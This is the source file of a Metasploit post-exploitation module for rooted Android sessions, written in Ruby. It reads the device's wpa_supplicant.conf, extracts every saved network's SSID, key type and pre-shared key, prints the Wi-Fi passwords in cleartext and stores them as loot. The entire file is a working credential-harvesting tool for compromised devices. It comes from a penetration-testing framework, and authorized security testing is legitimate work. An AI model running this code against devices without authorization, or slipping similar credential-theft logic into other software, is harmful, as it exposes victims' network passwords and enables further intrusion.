GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/android/gather/wireless_ap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
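# Post module for Android sessions: reads the wpa_supplicant configuration
# file as root, extracts the SSID, key_mgmt and psk of every `network={...}`
# block, prints them as a table and saves the table as loot.
class MetasploitModule < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Android::Priv

  # Registers the module metadata (name, description, authors, supported
  # session types, platform and stability notes).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gather Wireless SSIDs and PSKs',
        'Description' => %q{
          This module displays all wireless AP creds saved on the target device.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Auxilus', 'timwr'],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Platform' => 'android',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Reads the supplicant configuration, parses it and reports the result.
  #
  # Aborts with Failure::NoAccess when the session is not root. Returns early
  # with an error message when the file yields no data or no network blocks.
  #
  # @return [void]
  def run
    fail_with(Failure::NoAccess, 'This module requires root permissions.') unless is_root?

    data = read_file('/data/misc/wifi/wpa_supplicant.conf')

    # read_file may come back nil or empty when the file is absent or
    # unreadable; without this guard the String#scan call in the parser
    # would raise NoMethodError on nil instead of reporting the problem.
    if data.nil? || data.empty?
      print_error('Could not read /data/misc/wifi/wpa_supplicant.conf')
      return
    end

    aps = parse_wpa_supplicant(data)

    if aps.empty?
      print_error('No wireless APs found on the device')
      return
    end

    ap_tbl = Rex::Text::Table.new(
      'Header' => 'Wireless APs',
      'Indent' => 1,
      'Columns' => ['SSID', 'net_type', 'password']
    )

    # Each entry is the [ssid, key_mgmt, psk] triple built by parse_network_block.
    aps.each do |ssid, net_type, password|
      ap_tbl << [ssid, net_type, password]
    end

    # Both the console output and the loot file carry the PSKs in cleartext,
    # so console logs and the loot directory need the same handling as any
    # other recovered credential.
    print_line(ap_tbl.to_s)
    loot_path = store_loot(
      'wireless.ap.creds',
      'text/csv',
      session,
      ap_tbl.to_csv,
      'wireless_ap_credentials.txt'
    )
    print_good("Secrets stored in: #{loot_path}")
  end

  # Splits the configuration text into `network={ ... }` blocks and parses
  # each of them.
  #
  # @param data [String] contents of wpa_supplicant.conf
  # @return [Array<Array>] one [ssid, key_mgmt, psk] triple per network block
  def parse_wpa_supplicant(data)
    data.scan(/^network={$(.*?)^}$/m).map do |captures|
      parse_network_block(captures.first)
    end
  end

  # Extracts the three reported fields from the body of one network block.
  # A field that is not present in the block comes back as nil.
  #
  # @param block [String] text between `network={` and the closing `}`
  # @return [Array] [ssid, key_mgmt, psk]
  def parse_network_block(block)
    ssid = parse_option(block, 'ssid')
    type = parse_option(block, 'key_mgmt', strip_quotes: false)
    psk = parse_option(block, 'psk')
    [ssid, type, psk]
  end

  # Looks up `token=value` inside a network block.
  #
  # With strip_quotes the quoted form `token="value"` is tried first and the
  # value is returned without the quotes; otherwise, or when the quoted form
  # does not match, everything after `=` up to the end of the line is returned.
  # Both patterns expect exactly one whitespace character before the token.
  #
  # @param block [String] text of one network block
  # @param token [String] option name to look for
  # @param strip_quotes [Boolean] whether to try the quoted form first
  # @return [String, nil] the option value, or nil when the option is absent
  def parse_option(block, token, strip_quotes: true)
    # Escape the option name so it is always matched literally, whatever a
    # caller passes in.
    key = Regexp.escape(token)

    if strip_quotes && (quoted = block.match(/^\s#{key}="(.+)"$/))
      return quoted.captures[0]
    end

    plain = block.match(/^\s#{key}=(.+)$/)
    plain && plain.captures[0]
  end
end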